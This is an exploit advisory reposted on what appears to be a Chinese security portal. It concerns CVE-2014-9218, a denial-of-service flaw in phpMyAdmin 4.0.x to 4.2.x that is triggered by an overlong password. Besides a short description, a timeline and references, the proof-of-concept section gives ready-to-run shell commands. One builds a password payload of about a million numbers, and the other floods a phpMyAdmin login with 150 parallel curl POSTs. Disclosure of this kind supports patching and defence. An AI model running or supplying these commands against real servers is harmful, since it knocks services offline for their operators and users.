首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS
来源:http://www.behindthefirewalls.com 作者:Nieto 发布时间:2014-12-16  
=============
DESCRIPTION:
=============
A vulnerability present in in phpMyAdmin 4.0.x before 4.0.10.7, 4.1. x
before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers  to
cause a denial of service (resource consumption) via a long password.
CVE-2014-9218 was assigned

=============
Time Line:
=============
December 3, 2014 - A phpMyAdmin update and the security advisory is
published.

=============
Proof of Concept:
=============

*1 - Create the payload.*

$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s"
{1..1000000} >> payload

*2 - Performing the Denial of Service attack.*

$ for i in `seq 1 150`; do (curl --data @payload
http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done

=============
Authors:
=============

-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info
=============

References:
====================================================================

*
http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html
* http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ActualAnalyzer Cookie Command
·HTCSyncManager 3.1.33.0 - Serv
·tnftp - clientside BSD Exploit
·Avira 14.0.7.342 - (avguard.ex
·Wordpress Download Manager 2.7
·CodeMeter 4.50.906.503 - Servi
·Tuleap PHP Unserialize Code Ex
·ProjectSend r-561 - Arbitrary
·WordPress WP Symposium 14.11 S
·Jaangle 0.98i.977 Denial Of Se
·Advantech AdamView 4.30.003 -
·Mediacoder 0.8.33 Build 5680 B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved